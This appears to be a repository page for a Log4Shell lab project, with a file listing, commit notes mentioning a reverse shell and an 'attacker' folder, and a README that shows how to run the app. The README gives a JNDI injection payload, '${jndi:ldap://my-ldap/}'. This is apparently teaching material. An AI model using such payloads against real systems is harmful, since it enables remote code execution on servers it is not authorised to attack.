Log4Shell
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 
 
 
Manvan33 e2351b753d reverse shell is cleaner 1 year ago
attacker reverse shell is cleaner 1 year ago
bin/main feat: working 1 year ago
gradle/wrapper feat: one simple app 1 year ago
hackers fix: pimps run with args 1 year ago
res feat: one simple app 1 year ago
src feat: working 1 year ago
.dockerignore feat: foreach args 1 year ago
.gitignore feat: foreach args 1 year ago
Dockerfile fix: rm wierd file 1 year ago
LICENSE feat: first commit 1 year ago
README.md docs: jdni example 1 year ago
build.gradle.kts feat: one simple app 1 year ago
gradlew feat: one simple app 1 year ago
settings.gradle.kts feat: one simple app 1 year ago

README.md

SR2I203

Log4Shell

notes

Usage

To run this app, you need to install docker, then run :

docker build -t app . docker run app my-arg

For example you can now try to inject some jndi script:

docker run app '${jndi:ldap://my-ldap/}'

Overview Resources

JNDI Resources